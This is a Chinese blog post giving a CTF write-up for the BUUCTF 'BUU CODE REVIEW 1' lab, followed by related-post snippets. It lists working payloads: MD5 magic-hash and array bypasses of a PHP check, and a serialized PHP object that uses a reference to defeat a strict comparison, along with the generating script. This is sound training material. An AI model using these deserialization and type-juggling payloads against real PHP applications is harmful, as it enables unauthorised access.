BUU CODE REVIEW 1 1

最新推荐文章于 2024-04-24 10:42:37 发布
最新推荐文章于 2024-04-24 10:42:37 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: apache php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123851341
版权 
知识点:地址传值

在这里插入图片描述
法1:

GET:?pleaseget=1

POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

原理:QNKCDZO和240610708MD5一下为0e开头,又是弱等于,0的n次方还是0
法2:

GET:?pleaseget=1

POST:pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

原理:MD5无法加密数组,返回null所以相等

<?php
class BUU {
   public $correct = "";
   public $input ="";
}

$a = new BUU();
$a->input=&$a->correct;//把地址赋值过去,地址相同,值肯定也相同。
echo serialize($a);
?>

在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
BUUCTF/BUU CODE REVIEW 1
weixin_44041994的博客
03-20 455
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。序列化的定义是:在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送)以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。最后是进行反序列化的obj。
BUUCTF Basic 解题记录--BUU CODE REVIEW 1
weixin_43171033的博客
09-28 107
【代码】BUUCTF Basic 解题记录--BUU CODE REVIEW 1。
BUU CODE REVIEW 11反序列化
weixin_50339832的博客
09-09 551
反序列化漏洞 进入靶机是这个样子 首先进行分析后 看最后一行那个函数unserialize,判断反序列化 然后用post方法传obj变量,利用反序列化漏洞 这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法 到http://c.runoob.com/compile/1运行下列代码 <?php class BUU { public $correct=""; public $input=""; } $obj = new BUU...
常见的MD5碰撞
aeymp589524的博客
10-31 399
md5值为0e开头 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611...
BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3243
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
qq_58869808的博客
07-26 1563
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
BUU CODE REVIEW 1
Jay17的博客
07-31 1298
BUU CODE REVIEW 1
【CTF练习】BUU CODE REVIEW 1(代码审计)
m0_73866435的博客
01-31 1285
大致流程第一个if满足进入的条件为第二个if满足条件为。第三个if满足条件为。如果 1、2、3 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入类函数类函数也有一个if满足条件为。但是correct 却是利用一个时间进行计算的值的base64 值。那么为什么执行反序列化就会自动进行类函数执行呢,我们来了解一下魔术方法。
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 963
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
深入理解Java消息中间件-Apache Kafka
u011532237的博客
04-21 1459
Apache Kafka是一个开源的分布式事件流平台,由LinkedIn创建,并于2011年贡献给了Apache软件基金会。它设计用来高效处理实时数据流和大数据,通过发布-订阅的消息系统提供高吞吐量、持久存储、流数据处理等功能。
Apache Answer 开源问答社区安装体验
人人都懂物联网
04-20 1285
是由 SegmentFault 思否团队打造的一款问答平台软件,后端使用 Go 语言编写,于2022年10月24日(程序员节)正式开源。你可以免费使用 Answer 高效地搭建一个问答社区,并用于产品技术问答、客户支持、用户交流等场景。2023年10月9日,Answer 顺利通过投票,以全票通过的优秀表现正式进入 Apache 软件基金会(ASF)孵化器。10月18日,Answer 项目正式移交到 Apache 软件基金会名下,从此改名为 Apache Answer。
原生小程序自定义vantUI中van-collapse手风琴组件的标题
最新发布
文龙刚的博客
04-24 308
【代码】原生小程序自定义vantUI中van-collapse手风琴组件的标题。
BUU SQL COURSE 1
07-27
BUU SQL COURSE 1是一个关于SQL注入的课程。在这个课程中,学习者将学习如何通过注入恶意代码来绕过数据库的安全措施,从而获取敏感信息。课程内容包括找到注入点、闭合语句、带入语句进行爆破等技术。通过这些技术,学习者可以获取数据库的版本、数据库名称、用户名称等信息,还可以获取表的信息和字段的信息,最终获取表中的数据。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [SQL注入靶机练习:BUU SQL COURSE 1](https://blog.csdn.net/weixin_43785509/article/details/127914154)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Buuctf | BUU SQL COURSE 1](https://blog.csdn.net/m_de_g/article/details/122174226)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [BUU SQL COURSE 1](https://blog.csdn.net/Lumos427/article/details/116987356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值